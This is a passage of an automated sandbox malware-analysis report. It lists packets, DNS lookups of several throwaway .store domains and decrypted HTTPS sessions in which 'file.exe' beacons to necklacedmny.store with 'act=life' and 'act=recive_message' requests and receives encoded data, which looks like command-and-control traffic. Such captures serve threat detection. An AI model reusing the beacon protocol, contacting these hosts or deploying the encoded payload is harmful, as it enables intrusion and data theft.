                                                                Oct 31, 2024 11:27:56.680877924 CET49709443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:27:56.682152987 CET49709443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:27:56.682162046 CET44349709188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:27:56.682441950 CET44349709188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:27:56.683900118 CET49709443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:27:56.684099913 CET49709443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:27:56.684129000 CET44349709188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:27:56.684215069 CET49709443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:27:56.684223890 CET44349709188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:27:57.347186089 CET44349709188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:27:57.347558022 CET49709443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:27:57.347572088 CET44349709188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:27:57.347639084 CET49709443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:27:57.623469114 CET49710443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:27:57.623519897 CET44349710188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:27:57.623632908 CET49710443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:27:57.623966932 CET49710443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:27:57.623985052 CET44349710188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:27:58.356462002 CET44349710188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:27:58.356580019 CET49710443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:27:58.357799053 CET49710443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:27:58.357810974 CET44349710188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:27:58.358047009 CET44349710188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:27:58.359224081 CET49710443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:27:58.359342098 CET49710443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:27:58.359352112 CET44349710188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:27:59.019865990 CET44349710188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:27:59.019980907 CET44349710188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:27:59.020036936 CET49710443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:27:59.020136118 CET49710443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:27:59.494389057 CET49711443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:27:59.494457960 CET44349711188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:27:59.494551897 CET49711443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:27:59.494849920 CET49711443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:27:59.494867086 CET44349711188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:28:00.140445948 CET44349711188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:28:00.140619040 CET49711443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:28:00.142417908 CET49711443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:28:00.142422915 CET44349711188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:28:00.142862082 CET44349711188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:28:00.144391060 CET49711443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:28:00.145232916 CET49711443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:28:00.145272970 CET44349711188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:28:00.145384073 CET49711443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:28:00.145411968 CET44349711188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:28:00.145534992 CET49711443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:28:00.145569086 CET44349711188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:28:00.145716906 CET49711443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:28:00.145745993 CET44349711188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:28:00.145958900 CET49711443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:28:00.145987988 CET44349711188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:28:00.146167040 CET49711443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:28:00.146199942 CET44349711188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:28:00.146214008 CET49711443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:28:00.146225929 CET44349711188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:28:00.146384954 CET49711443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:28:00.146425962 CET44349711188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:28:00.146461010 CET49711443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:28:00.146603107 CET49711443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:28:00.146641016 CET49711443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:28:00.156112909 CET44349711188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:28:00.156331062 CET49711443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:28:00.156380892 CET44349711188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:28:00.156397104 CET49711443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:28:00.156433105 CET49711443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:28:00.156471014 CET49711443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:28:00.157001019 CET44349711188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:28:01.893723011 CET44349711188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:28:01.893935919 CET44349711188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:28:01.894036055 CET49711443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:28:01.894117117 CET49711443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:28:01.894130945 CET44349711188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:28:01.943557024 CET49712443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:28:01.943603992 CET44349712188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:28:01.943698883 CET49712443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:28:01.944048882 CET49712443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:28:01.944062948 CET44349712188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:28:02.159347057 CET49712443192.168.2.5188.114.96.3

                                                                UDP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Oct 31, 2024 11:27:50.193063974 CET5709853192.168.2.51.1.1.1
                                                                Oct 31, 2024 11:27:50.202379942 CET53570981.1.1.1192.168.2.5
                                                                Oct 31, 2024 11:27:50.209111929 CET6047353192.168.2.51.1.1.1
                                                                Oct 31, 2024 11:27:50.218072891 CET53604731.1.1.1192.168.2.5
                                                                Oct 31, 2024 11:27:50.219788074 CET5613653192.168.2.51.1.1.1
                                                                Oct 31, 2024 11:27:50.235841990 CET53561361.1.1.1192.168.2.5
                                                                Oct 31, 2024 11:27:50.243010044 CET5269853192.168.2.51.1.1.1
                                                                Oct 31, 2024 11:27:50.252259970 CET53526981.1.1.1192.168.2.5
                                                                Oct 31, 2024 11:27:50.254410028 CET5711253192.168.2.51.1.1.1
                                                                Oct 31, 2024 11:27:50.268296957 CET53571121.1.1.1192.168.2.5

                                                                DNS Queries

                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                Oct 31, 2024 11:27:50.193063974 CET192.168.2.51.1.1.10x3c4cStandard query (0)presticitpo.storeA (IP address)IN (0x0001)false
                                                                Oct 31, 2024 11:27:50.209111929 CET192.168.2.51.1.1.10xc284Standard query (0)crisiwarny.storeA (IP address)IN (0x0001)false
                                                                Oct 31, 2024 11:27:50.219788074 CET192.168.2.51.1.1.10xc63fStandard query (0)fadehairucw.storeA (IP address)IN (0x0001)false
                                                                Oct 31, 2024 11:27:50.243010044 CET192.168.2.51.1.1.10xc2e7Standard query (0)thumbystriw.storeA (IP address)IN (0x0001)false
                                                                Oct 31, 2024 11:27:50.254410028 CET192.168.2.51.1.1.10x2692Standard query (0)necklacedmny.storeA (IP address)IN (0x0001)false

                                                                DNS Answers

                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                Oct 31, 2024 11:27:50.202379942 CET1.1.1.1192.168.2.50x3c4cName error (3)presticitpo.storenonenoneA (IP address)IN (0x0001)false
                                                                Oct 31, 2024 11:27:50.218072891 CET1.1.1.1192.168.2.50xc284Name error (3)crisiwarny.storenonenoneA (IP address)IN (0x0001)false
                                                                Oct 31, 2024 11:27:50.235841990 CET1.1.1.1192.168.2.50xc63fName error (3)fadehairucw.storenonenoneA (IP address)IN (0x0001)false
                                                                Oct 31, 2024 11:27:50.252259970 CET1.1.1.1192.168.2.50xc2e7Name error (3)thumbystriw.storenonenoneA (IP address)IN (0x0001)false
                                                                Oct 31, 2024 11:27:50.268296957 CET1.1.1.1192.168.2.50x2692No error (0)necklacedmny.store188.114.96.3A (IP address)IN (0x0001)false
                                                                Oct 31, 2024 11:27:50.268296957 CET1.1.1.1192.168.2.50x2692No error (0)necklacedmny.store188.114.97.3A (IP address)IN (0x0001)false

                                                                HTTP Request Dependency Graph

                                                                • necklacedmny.store

                                                                HTTPS Proxied Packets

                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                0192.168.2.549705188.114.96.34436764C:\Users\user\Desktop\file.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-10-31 10:27:51 UTC265OUTPOST /api HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                Content-Length: 8
                                                                Host: necklacedmny.store
                                                                2024-10-31 10:27:51 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                Data Ascii: act=life
                                                                2024-10-31 10:27:51 UTC1017INHTTP/1.1 200 OK
                                                                Date: Thu, 31 Oct 2024 10:27:51 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Set-Cookie: PHPSESSID=6qugag829aos5a1dj3hs486e5e; expires=Mon, 24-Feb-2025 04:14:30 GMT; Max-Age=9999999; path=/
                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                Pragma: no-cache
                                                                cf-cache-status: DYNAMIC
                                                                vary: accept-encoding
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZEKh283v3dkxdJH7uikhfDr0N9%2FJ6Vc3Q9Vki1f3atfWc5krCCj7VDmOSzdDtam5kevGqdYCgJFterXhzO%2BFTQlDb3BFjPoam7fXeQS%2BcY0cnV%2BeB8k7xoxShcW0Mt%2Frx85Rukc%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8db2f4754e58e7f3-DFW
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1684&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2844&recv_bytes=909&delivery_rate=1737252&cwnd=194&unsent_bytes=0&cid=2853427ee9405f19&ts=762&x=0"
                                                                2024-10-31 10:27:51 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                Data Ascii: 2ok
                                                                2024-10-31 10:27:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1192.168.2.549706188.114.96.34436764C:\Users\user\Desktop\file.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-10-31 10:27:52 UTC266OUTPOST /api HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                Content-Length: 52
                                                                Host: necklacedmny.store
                                                                2024-10-31 10:27:52 UTC52OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e 64 61 72 79 79 26 6a 3d
                                                                Data Ascii: act=recive_message&ver=4.0&lid=4SD0y4--legendaryy&j=
                                                                2024-10-31 10:27:52 UTC1017INHTTP/1.1 200 OK
                                                                Date: Thu, 31 Oct 2024 10:27:52 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Set-Cookie: PHPSESSID=mdf6ni9arqvdioorbgi5fb7eok; expires=Mon, 24-Feb-2025 04:14:31 GMT; Max-Age=9999999; path=/
                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                Pragma: no-cache
                                                                cf-cache-status: DYNAMIC
                                                                vary: accept-encoding
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ysEuHBhuzaNG0LBR57qrOheUJQe3ZMpWOlfE9OxNeURD5ZZm0xN06nkKG6K9nSigOd2NEDg%2Buq1GyM112yGtjnTIwwBXZwD%2BN9EcLaxm%2B0pvjjjz2du53nD35Th5zlFD%2F%2FKdLrY%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8db2f47d1c102ca5-DFW
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1041&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2844&recv_bytes=954&delivery_rate=2683966&cwnd=251&unsent_bytes=0&cid=76d3650a98467175&ts=501&x=0"
                                                                2024-10-31 10:27:52 UTC352INData Raw: 34 65 30 0d 0a 37 2f 6d 4d 69 37 52 4f 72 36 79 6f 71 78 69 67 64 6d 57 35 35 48 72 52 67 5a 34 66 65 33 6b 4c 5a 52 35 6e 4a 37 43 4a 68 64 2b 55 32 2f 71 70 6a 6e 71 44 6a 74 76 4f 4f 70 6f 43 46 38 79 42 56 76 50 67 2b 6a 31 42 48 32 6f 4a 62 51 49 4c 6b 76 2f 6f 2f 64 57 66 37 65 66 48 4b 34 4f 4f 7a 64 4d 36 6d 69 30 65 6d 34 45 55 38 37 75 38 65 68 45 62 61 67 6c 38 42 6b 7a 66 2b 65 6d 38 68 35 58 72 34 39 45 74 79 38 33 45 78 6e 33 46 45 77 54 54 69 68 4f 38 36 66 4d 39 56 31 74 75 48 7a 78 64 42 66 33 73 38 62 36 69 6d 50 2f 67 6c 6a 4f 44 31 34 72 4f 64 6f 4a 4d 52 39 69 42 47 4c 33 6e 2b 6e 51 54 45 57 4d 42 66 51 4e 4e 77 4f 44 6a 74 34 65 62 36 4f 4c 62 4a 4e 2f 41 7a 73 46 32 77 78 6b 45 6d 38 68 59 74 50 75 38 4a 56 6c 49 57 77 52 74 46 46
                                                                Data Ascii: 4e07/mMi7ROr6yoqxigdmW55HrRgZ4fe3kLZR5nJ7CJhd+U2/qpjnqDjtvOOpoCF8yBVvPg+j1BH2oJbQILkv/o/dWf7efHK4OOzdM6mi0em4EU87u8ehEbagl8Bkzf+em8h5Xr49Ety83Exn3FEwTTihO86fM9V1tuHzxdBf3s8b6imP/gljOD14rOdoJMR9iBGL3n+nQTEWMBfQNNwODjt4eb6OLbJN/AzsF2wxkEm8hYtPu8JVlIWwRtFF
                                                                2024-10-31 10:27:52 UTC903INData Raw: 58 49 63 33 63 77 73 4a 78 78 77 59 4d 30 6f 73 56 73 2b 37 32 63 68 6f 62 62 67 31 32 43 6b 2f 57 35 75 71 37 6a 5a 75 75 70 35 59 72 31 59 36 53 69 56 6e 48 42 41 44 58 6b 46 71 4a 6f 2b 4d 7a 41 46 74 75 43 7a 78 64 42 64 72 75 35 4c 36 47 6c 4f 33 68 33 54 37 4e 33 4d 7a 45 66 39 41 53 41 74 57 4d 47 36 48 70 38 6e 73 61 45 6d 49 4f 65 51 4a 42 6b 71 57 6e 75 70 58 62 74 71 6e 33 49 63 62 43 77 4e 35 36 67 67 74 4a 77 73 59 66 76 36 4f 6b 50 52 30 61 62 51 5a 34 43 30 76 57 35 2b 47 7a 67 4a 54 6f 34 39 59 72 78 38 62 43 79 48 66 4a 47 77 66 65 69 78 79 31 37 2f 31 34 57 56 55 70 41 47 52 46 48 5a 4c 46 34 4c 36 66 32 64 76 71 32 43 4c 4b 32 49 72 57 4e 4e 74 55 41 4e 66 47 51 50 50 74 2b 58 49 4c 47 6e 73 43 63 68 64 4a 31 2b 33 71 76 6f 4f 62 36 2b
                                                                Data Ascii: XIc3cwsJxxwYM0osVs+72chobbg12Ck/W5uq7jZuup5Yr1Y6SiVnHBADXkFqJo+MzAFtuCzxdBdru5L6GlO3h3T7N3MzEf9ASAtWMG6Hp8nsaEmIOeQJBkqWnupXbtqn3IcbCwN56ggtJwsYfv6OkPR0abQZ4C0vW5+GzgJTo49Yrx8bCyHfJGwfeixy17/14WVUpAGRFHZLF4L6f2dvq2CLK2IrWNNtUANfGQPPt+XILGnsCchdJ1+3qvoOb6+
                                                                2024-10-31 10:27:52 UTC1369INData Raw: 33 66 38 63 0d 0a 77 38 42 6f 79 42 67 4a 79 59 73 53 74 75 33 77 65 42 59 62 61 41 5a 79 44 30 36 53 70 61 65 36 6c 64 75 32 71 66 6b 68 33 64 7a 41 77 6d 75 41 49 51 54 56 69 42 2b 6c 6f 2b 4d 7a 41 46 74 75 43 7a 78 64 42 64 6e 74 36 37 47 4e 6e 66 7a 6e 32 54 37 48 33 4d 37 48 66 73 34 61 44 74 61 4a 48 61 48 6e 2f 47 38 59 48 6d 34 4a 63 52 64 41 6b 71 57 6e 75 70 58 62 74 71 6e 73 47 4d 72 65 32 38 34 34 39 78 63 4a 31 59 45 4f 38 2f 79 79 5a 46 6b 63 5a 55 63 6b 52 55 62 65 35 75 36 34 67 6f 6e 6b 35 64 63 2b 79 73 66 44 77 33 76 4d 47 77 7a 58 67 77 71 34 37 50 52 79 47 42 5a 6b 44 48 67 46 42 5a 79 72 34 4b 58 4e 77 36 37 49 32 79 50 66 7a 64 75 4c 54 38 45 61 43 64 79 51 57 4b 79 74 35 54 30 65 46 79 6c 66 50 41 52 4a 33 75 72 6f 75 34 65 54 37
                                                                Data Ascii: 3f8cw8BoyBgJyYsStu3weBYbaAZyD06Spae6ldu2qfkh3dzAwmuAIQTViB+lo+MzAFtuCzxdBdnt67GNnfzn2T7H3M7Hfs4aDtaJHaHn/G8YHm4JcRdAkqWnupXbtqnsGMre28449xcJ1YEO8/yyZFkcZUckRUbe5u64gonk5dc+ysfDw3vMGwzXgwq47PRyGBZkDHgFBZyr4KXNw67I2yPfzduLT8EaCdyQWKyt5T0eFylfPARJ3urou4eT7
                                                                2024-10-31 10:27:52 UTC1369INData Raw: 4a 7a 73 66 43 64 4d 77 64 43 39 4f 4b 48 36 48 75 2b 58 55 54 45 6d 77 4c 63 51 5a 58 30 65 71 6e 38 38 32 63 39 71 6d 4f 62 4f 72 39 2f 65 6f 36 33 56 6f 65 6d 34 45 55 38 37 75 38 66 42 45 63 5a 77 4e 75 43 31 66 63 37 4f 65 37 68 5a 50 70 35 64 67 69 33 38 62 4c 79 58 54 4e 48 41 37 66 68 78 79 33 37 2f 73 39 56 31 74 75 48 7a 78 64 42 66 72 6f 2f 61 66 50 74 65 58 70 30 54 7a 62 31 59 72 57 4e 4e 74 55 41 4e 66 47 51 50 50 6e 39 33 63 51 47 47 41 44 63 51 56 4d 33 65 4c 76 73 49 57 4a 37 2b 50 45 4b 4d 6a 50 78 63 4e 2b 79 68 67 49 31 34 49 4b 75 4b 4f 79 50 52 34 44 4b 56 38 38 4a 55 37 45 79 50 57 76 7a 59 53 67 38 4a 59 72 77 59 36 53 69 58 50 4f 46 51 62 52 67 42 4f 32 37 76 78 34 45 78 78 6c 42 33 77 47 51 39 54 6d 37 37 57 42 6c 2b 33 6b 30 79
                                                                Data Ascii: JzsfCdMwdC9OKH6Hu+XUTEmwLcQZX0eqn882c9qmObOr9/eo63Voem4EU87u8fBEcZwNuC1fc7Oe7hZPp5dgi38bLyXTNHA7fhxy37/s9V1tuHzxdBfro/afPteXp0Tzb1YrWNNtUANfGQPPn93cQGGADcQVM3eLvsIWJ7+PEKMjPxcN+yhgI14IKuKOyPR4DKV88JU7EyPWvzYSg8JYrwY6SiXPOFQbRgBO27vx4ExxlB3wGQ9Tm77WBl+3k0y
                                                                2024-10-31 10:27:52 UTC1369INData Raw: 78 33 76 45 47 41 71 62 79 46 69 30 2b 37 77 6c 57 54 78 7a 43 6e 6f 53 56 4f 66 73 35 2b 7a 4e 68 4b 44 77 6c 69 76 42 6a 70 4b 4a 64 38 34 65 43 74 36 43 45 4c 54 67 2f 58 45 64 46 6d 51 44 64 51 46 41 77 50 6e 68 73 34 32 55 34 4f 62 61 50 73 50 4c 79 73 55 36 6a 46 51 41 77 38 5a 41 38 39 4c 72 66 56 6b 45 4a 78 34 38 41 6b 6d 53 73 36 65 79 67 49 6e 69 35 74 59 74 7a 73 72 42 7a 6e 7a 45 46 51 54 65 68 52 32 31 34 76 78 78 45 78 78 68 44 58 49 49 51 39 62 74 34 66 33 44 32 2b 6e 78 6c 6e 53 4e 2f 4d 66 48 63 38 45 53 43 73 32 75 4b 66 50 38 73 6d 52 5a 48 47 56 48 4a 45 56 42 32 65 50 72 75 49 57 65 37 2b 48 63 4a 4d 4c 42 32 4d 68 31 79 78 4d 4d 31 6f 6b 57 74 75 33 75 65 68 49 51 59 51 35 79 41 77 57 63 71 2b 43 6c 7a 63 4f 75 33 39 55 69 78 74 2f
                                                                Data Ascii: x3vEGAqbyFi0+7wlWTxzCnoSVOfs5+zNhKDwlivBjpKJd84eCt6CELTg/XEdFmQDdQFAwPnhs42U4ObaPsPLysU6jFQAw8ZA89LrfVkEJx48AkmSs6eygIni5tYtzsrBznzEFQTehR214vxxExxhDXIIQ9bt4f3D2+nxlnSN/MfHc8ESCs2uKfP8smRZHGVHJEVB2ePruIWe7+HcJMLB2Mh1yxMM1okWtu3uehIQYQ5yAwWcq+ClzcOu39Uixt/
                                                                2024-10-31 10:27:52 UTC1369INData Raw: 42 55 49 6d 38 68 59 74 50 75 38 4a 56 6b 71 66 77 42 37 43 67 66 37 37 50 79 38 68 35 6a 6c 35 5a 59 7a 67 39 65 4b 7a 6e 61 43 54 45 66 57 69 68 57 33 38 66 42 39 47 52 4a 75 44 57 34 4b 53 74 2f 6f 35 37 69 66 6d 76 7a 6d 33 53 6e 4f 79 73 58 47 64 73 6f 65 52 35 58 47 48 36 75 6a 70 44 30 31 47 48 67 4e 50 69 4a 66 78 4f 7a 72 72 49 61 57 34 71 6e 4a 59 74 53 4f 7a 63 55 36 6d 6c 51 48 32 6f 73 4b 74 75 4c 32 64 78 51 54 5a 67 4a 35 43 6b 48 57 34 4f 6d 76 67 35 54 75 37 39 30 74 79 4d 33 42 77 33 54 4c 42 6b 65 56 78 68 2b 72 6f 36 51 39 4d 77 42 6f 43 6e 42 48 61 39 6e 39 34 50 2b 73 6c 65 58 75 32 6a 71 4e 30 59 54 51 4f 73 55 59 52 34 50 47 45 62 33 76 2f 33 6f 52 45 32 77 48 64 77 56 4b 32 4f 58 67 72 34 65 58 35 50 76 5a 4c 38 44 4b 78 38 4e 2f
                                                                Data Ascii: BUIm8hYtPu8JVkqfwB7Cgf77Py8h5jl5ZYzg9eKznaCTEfWihW38fB9GRJuDW4KSt/o57ifmvzm3SnOysXGdsoeR5XGH6ujpD01GHgNPiJfxOzrrIaW4qnJYtSOzcU6mlQH2osKtuL2dxQTZgJ5CkHW4Omvg5Tu790tyM3Bw3TLBkeVxh+ro6Q9MwBoCnBHa9n94P+sleXu2jqN0YTQOsUYR4PGEb3v/3oRE2wHdwVK2OXgr4eX5PvZL8DKx8N/
                                                                2024-10-31 10:27:52 UTC1369INData Raw: 66 47 51 50 50 6a 2b 48 45 61 48 47 63 49 63 51 70 43 32 65 54 74 73 35 2b 55 36 2b 48 61 4a 4d 44 63 77 4d 4e 6f 79 78 30 4b 31 59 34 4b 73 4b 4f 79 50 52 34 44 4b 56 38 38 4e 30 2f 52 35 2f 47 77 67 74 76 78 70 38 39 73 79 73 4b 4b 6b 54 72 51 42 67 66 51 68 68 2b 39 38 66 31 31 46 68 46 70 41 58 63 50 52 74 76 76 36 62 53 4c 6d 75 50 6f 31 79 7a 49 7a 73 50 62 64 34 4a 61 52 39 79 65 57 4f 75 6a 79 33 45 53 4b 6d 6f 52 50 42 6f 4c 79 36 76 67 73 63 33 44 72 75 6a 45 49 63 58 4b 79 73 52 38 79 52 55 47 32 49 59 59 73 4f 50 35 64 68 59 64 62 67 70 32 44 45 7a 41 34 2b 4f 76 6a 5a 66 71 71 5a 68 73 79 74 61 4b 6b 54 72 79 46 77 7a 58 68 68 57 6d 6f 2b 4d 7a 41 46 74 75 43 7a 78 64 42 64 72 67 37 4c 75 47 6d 4f 33 6e 33 53 62 43 77 63 44 50 66 4d 6f 52 42
                                                                Data Ascii: fGQPPj+HEaHGcIcQpC2eTts5+U6+HaJMDcwMNoyx0K1Y4KsKOyPR4DKV88N0/R5/Gwgtvxp89sysKKkTrQBgfQhh+98f11FhFpAXcPRtvv6bSLmuPo1yzIzsPbd4JaR9yeWOujy3ESKmoRPBoLy6vgsc3DrujEIcXKysR8yRUG2IYYsOP5dhYdbgp2DEzA4+OvjZfqqZhsytaKkTryFwzXhhWmo+MzAFtuCzxdBdrg7LuGmO3n3SbCwcDPfMoRB
                                                                2024-10-31 10:27:52 UTC1369INData Raw: 78 34 76 46 74 48 6c 73 6e 52 33 70 46 48 59 4b 6c 70 37 6d 63 32 37 61 35 68 48 65 59 6e 5a 32 5a 4b 4e 31 61 48 70 75 51 57 4f 75 78 73 6a 30 4c 57 7a 46 48 4f 77 5a 58 77 4f 33 6b 71 34 37 63 30 4e 66 32 4a 38 48 4e 78 73 68 39 67 6c 70 48 31 4d 5a 41 69 71 50 2f 62 77 74 55 65 42 46 78 46 55 4b 65 34 2f 61 77 67 64 75 67 71 5a 6f 6f 78 73 4c 50 7a 6d 71 4e 42 68 66 51 69 67 37 2f 35 2b 34 39 56 31 74 34 44 48 4d 58 53 39 57 6b 39 71 75 41 69 2b 33 73 30 57 44 46 33 38 66 46 4f 6f 78 55 45 74 43 4b 48 72 37 32 73 32 77 50 47 48 38 41 4d 41 31 55 33 2b 65 6e 67 73 50 62 39 71 6d 4f 62 50 6a 4e 78 4d 64 39 31 41 56 4b 2b 34 30 55 73 4f 2f 39 65 6c 6c 56 4b 51 45 38 58 52 61 63 71 2b 4f 73 7a 63 4f 2b 75 34 31 35 6e 70 6d 61 6d 32 57 4d 44 55 66 4e 78 6b
                                                                Data Ascii: x4vFtHlsnR3pFHYKlp7mc27a5hHeYnZ2ZKN1aHpuQWOuxsj0LWzFHOwZXwO3kq47c0Nf2J8HNxsh9glpH1MZAiqP/bwtUeBFxFUKe4/awgdugqZooxsLPzmqNBhfQig7/5+49V1t4DHMXS9Wk9quAi+3s0WDF38fFOoxUEtCKHr72s2wPGH8AMA1U3+engsPb9qmObPjNxMd91AVK+40UsO/9ellVKQE8XRacq+OszcO+u415npmam2WMDUfNxk
                                                                2024-10-31 10:27:52 UTC1369INData Raw: 50 51 74 62 4d 55 63 37 43 30 6a 54 36 4f 6d 2b 6e 34 6e 6f 36 73 41 76 69 76 44 30 37 48 66 50 45 51 6e 63 75 43 61 53 36 65 78 77 46 68 78 58 4f 55 73 55 51 73 4b 70 77 62 36 62 6d 4b 36 6e 6c 6a 53 4e 6c 6f 72 6f 63 4e 49 5a 43 4e 7a 47 56 76 50 6e 76 43 56 5a 50 6d 51 4b 65 51 74 43 6b 4d 72 74 72 59 43 55 36 61 6d 59 62 4d 47 4f 6b 6f 6c 37 79 41 51 4b 31 49 46 55 74 50 6e 37 50 56 64 62 5a 30 63 6b 52 55 54 59 2b 2b 71 79 69 74 66 6f 35 39 68 73 30 6f 44 54 69 57 79 43 54 46 53 56 78 67 72 7a 75 37 77 36 46 78 5a 6f 42 48 49 47 56 38 44 74 35 4b 75 4f 33 4e 44 58 38 79 48 41 79 38 54 4f 52 50 77 31 44 63 75 4c 46 37 53 68 33 48 6f 50 47 46 63 35 53 78 52 43 77 71 6e 42 76 70 75 59 72 71 65 57 4e 49 32 57 69 75 68 77 30 68 6b 49 33 4d 51 34 74 50 58
